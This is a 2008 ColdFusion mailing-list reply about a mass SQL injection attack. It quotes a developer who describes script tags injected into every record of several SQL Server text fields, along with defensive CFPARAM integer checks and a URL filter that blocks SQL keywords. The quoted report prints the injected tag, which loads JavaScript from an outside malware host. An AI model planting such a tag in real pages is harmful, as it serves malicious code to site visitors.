Bruce... Without going into the whole thing, the script runs in your database and selects against the systables and syscolumns tables. It then loops over these and performs updates on existing records.
You really need to go back and read the entire thread from 3 weeks ago. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065 It has everything you'd need to know about what this attack does, how to reverse the results, and lastly how to prevent it from happening again. andy -----Original Message----- From: Bruce Schuman [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 11:17 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src="http://jjmaoduo.3322.org/csrss/w.js"; and a few more things in html I didn't include What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm: ><CFIF IsDefined("groupid")> ><CFPARAM NAME="groupid" TYPE="integer"> </CFIF> <CFIF >IsDefined("login")> <CFPARAM NAME="login" TYPE="integer"> </CFIF> <CFIF >IsDefined("sg")> <CFPARAM NAME="sg" TYPE="integer"> </CFIF> <CFIF >IsDefined("messageid")> <CFPARAM NAME="messageid" TYPE="integer"> ></CFIF> <CFIF IsDefined("msg")> <CFPARAM NAME="msg" TYPE="integer"> ></CFIF> So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses, Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL "loop" script that was offered by Justin Scott >Actually, with this particular SQL injection attack it's really easy to >stop. We created a SQL filter that is called from application.cfm. It >loops through the URL structure and checks to see if any URL variables >contain both a semi-colon and any SQL keyword. If a match is found, it >just cfaborts the request and sends us an e-mail with the details. We >periodically review those messages and have not found a single >false-positive yet after deployment to every site we manage. Granted, >it will not stop SQL injection through form posts, but I don't recall >ever seeing a SQL injection attack through a form post (yet). At the >least it can put an immediate stop to the current flood and give you >time to implement other protective measures such as cfqueryparam, etc. >We have CF5 and CFMX versions if anyone wants a copy. Bruce Schuman Santa Barbara CA http://originresearch.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310391 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
